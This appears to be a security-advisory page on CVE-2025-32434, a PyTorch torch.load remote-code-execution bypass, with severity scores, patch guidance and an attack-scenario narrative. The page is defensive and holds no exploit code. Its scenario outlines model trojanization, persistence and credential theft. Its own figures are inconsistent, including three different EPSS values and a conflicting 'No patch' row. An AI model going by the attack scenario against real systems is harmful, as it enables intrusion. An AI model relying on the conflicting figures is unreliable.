CVE-2025-32434: PyTorch RCE bypasses

CISO Take

Any system loading PyTorch models with torch.load() — even with the supposedly safe weights_only=True flag — is vulnerable to remote code execution. Upgrade to torch >= 2.6.0 immediately; this is not optional. Treat all externally-sourced model files as untrusted inputs regardless of loading parameters until patched.

What is the risk?

CRITICAL. CVSS 9.8 with no-auth, network-reachable, zero-user-interaction attack path. The amplifying factor is deception: weights_only=True was the documented secure practice, so teams that followed security guidance are still exposed. Attack surface is enormous — model hubs, CI/CD pipelines pulling pre-trained weights, inference servers, and any MLOps workflow that loads .pt/.pth files. EPSS of 1.2% is low today but PoC development is predictable given the high-profile nature of the bypass.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
PyTorch	pip	—	No patch
100.9K OpenSSF 6.4 22.7K dependents Pushed 2d ago 11% patched ~216d to patch Full package profile →
PyTorch	pip	< 2.6.0	`2.6.0`
100.9K OpenSSF 6.4 22.7K dependents Pushed 2d ago 11% patched ~216d to patch Full package profile →

How severe is it?

CVSS 3.1

9.8 / 10

EPSS

1.9%

chance of exploitation in 30 days

Higher than 77% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Moderate

Exploitation Confidence

medium

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV Network

AC Low

PR None

UI None

S Unchanged

C High

I High

A High

What should I do?

6 steps

PATCH

Upgrade torch to >= 2.6.0 immediately (pip install --upgrade torch).
INVENTORY

Identify all code paths using torch.load() — grep codebase for 'torch.load'.
VALIDATE MODEL PROVENANCE

Implement cryptographic signing/verification of model artifacts before loading (e.g., model card checksums from official sources).
SANDBOX

Run model loading in isolated containers/VMs with no network egress and minimal filesystem access.
DETECT

Alert on unexpected network connections or subprocess spawns from model serving processes.
INTERIM WORKAROUND (if patching is delayed): Only load models from cryptographically verified, internal-only sources and block external model downloads at the network level.

What does CISA's SSVC say?

Decision Track*

Exploitation none

Automatable Yes

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Code Execution Supply Chain Framework Model Inference AML.T0002.001 - Models AML.T0010.001 - AI Software AML.T0011.000 - Unsafe AI Artifacts AML.T0018.002 - Embed Malware AML.T0058 - Publish Poisoned Models AML.T0072 - Reverse Shell

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 17 - Quality management system Article 9 - Risk management system for high-risk AI

ISO 42001

A.6.2.6 - AI supply chain security A.8.4 - AI system risk management during deployment

NIST AI RMF

GOVERN 1.1 - Policies and processes for AI risk MEASURE 2.5 - Risk metrics for AI components and dependencies

OWASP LLM Top 10

LLM03 - Training Data Poisoning / Supply Chain

Frequently Asked Questions

What is CVE-2025-32434?

Any system loading PyTorch models with torch.load() — even with the supposedly safe weights_only=True flag — is vulnerable to remote code execution. Upgrade to torch >= 2.6.0 immediately; this is not optional. Treat all externally-sourced model files as untrusted inputs regardless of loading parameters until patched.

Is CVE-2025-32434 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-32434, increasing the risk of exploitation.

How to fix CVE-2025-32434?

1. PATCH: Upgrade torch to >= 2.6.0 immediately (pip install --upgrade torch). 2. INVENTORY: Identify all code paths using torch.load() — grep codebase for 'torch.load'. 3. VALIDATE MODEL PROVENANCE: Implement cryptographic signing/verification of model artifacts before loading (e.g., model card checksums from official sources). 4. SANDBOX: Run model loading in isolated containers/VMs with no network egress and minimal filesystem access. 5. DETECT: Alert on unexpected network connections or subprocess spawns from model serving processes. 6. INTERIM WORKAROUND (if patching is delayed): Only load models from cryptographically verified, internal-only sources and block external model downloads at the network level.

What systems are affected by CVE-2025-32434?

This vulnerability affects the following AI/ML architecture patterns: model serving, training pipelines, transfer learning workflows, MLOps CI/CD pipelines, model registries and hubs.

What is the CVSS score for CVE-2025-32434?

CVE-2025-32434 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 1.88%.

What is the AI security impact?

Affected AI Architectures

model servingtraining pipelinestransfer learning workflowsMLOps CI/CD pipelinesmodel registries and hubs

MITRE ATLAS Techniques

AML.T0002.001 Models

AML.T0010.001 AI Software

AML.T0011.000 Unsafe AI Artifacts

AML.T0018.002 Embed Malware

AML.T0058 Publish Poisoned Models

AML.T0072 Reverse Shell

Compliance Controls Affected

EU AI Act: Article 17, Article 9

ISO 42001: A.6.2.6, A.8.4

NIST AI RMF: GOVERN 1.1, MEASURE 2.5

OWASP LLM Top 10: LLM03

What are the technical details?

Original Advisory

PyTorch is a Python package that provides tensor computation with strong GPU acceleration and deep neural networks built on a tape-based autograd system. In version 2.5.1 and prior, a Remote Command Execution (RCE) vulnerability exists in PyTorch when loading a model using torch.load with weights_only=True. This issue has been patched in version 2.6.0.

Exploitation Scenario

Adversary publishes a malicious PyTorch model to a public hub (HuggingFace, GitHub, Kaggle) — either a novel model or a trojanized version of a popular one (BERT, Llama, ResNet). A data scientist or MLOps pipeline downloads and loads it with torch.load(model_path, weights_only=True), trusting the flag provides safety. The crafted serialization payload bypasses the weights_only restriction, executing arbitrary Python during deserialization. Adversary achieves RCE on the inference server or training node, establishes persistence, and pivots to access training data, model IP, cloud credentials, or connected infrastructure. In a model-serving context exposed via API, the attack may be remotely triggerable without requiring the victim to manually download anything.

Weaknesses (CWE)

CWE-502 Deserialization of Untrusted Data Primary CWE-502 Deserialization of Untrusted Data

CWE-502 — Deserialization of Untrusted Data: The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.

[Architecture and Design, Implementation] If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.
[Implementation] When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.

Source: MITRE CWE corpus.